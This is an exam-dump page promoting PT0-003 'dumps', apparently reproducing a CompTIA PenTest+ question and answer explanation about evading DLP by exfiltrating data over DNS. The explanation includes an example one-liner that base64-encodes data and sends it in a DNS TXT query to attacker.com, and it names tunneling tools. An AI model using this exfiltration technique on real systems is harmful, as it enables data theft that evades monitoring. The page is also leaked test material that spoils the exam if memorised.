Valid PT0-003 Dumps shared by ExamDiscuss.com for Helping Passing PT0-003 Exam! ExamDiscuss.com now offer the newest PT0-003 exam dumps, the ExamDiscuss.com PT0-003 exam questions have been updated and answers have been corrected get the newest ExamDiscuss.com PT0-003 dumps with Test Engine here:
A penetration tester has discovered sensitive files on a system. Assuming exfiltration of the files is part of the scope of the test, which of the following is most likely to evade DLP systems?
Correct Answer: A
DLP (Data Loss Prevention) systems monitor and block sensitive data transfers over HTTP, FTP, Email, and removable devices. Encoding the data and exfiltrating through DNS (Option A): DNS is often overlooked by DLP systems because it is required for network functionality. Attackers use DNS tunneling (e.g., dnscat2, IODINE) to exfiltrate data inside DNS queries. Example method echo "Sensitive Data" | base64 | nslookup -q=TXT attacker.com Reference: CompTIA PenTest+ PT0-003 Official Study Guide - "Data Exfiltration Techniques" Incorrect options: Option B (Cloud storage): Many organizations monitor file uploads to cloud storage. Option C (FTP): FTP is easily monitored and flagged by DLP solutions. Option D (Hashing and emailing): Emails are actively scanned by DLP policies.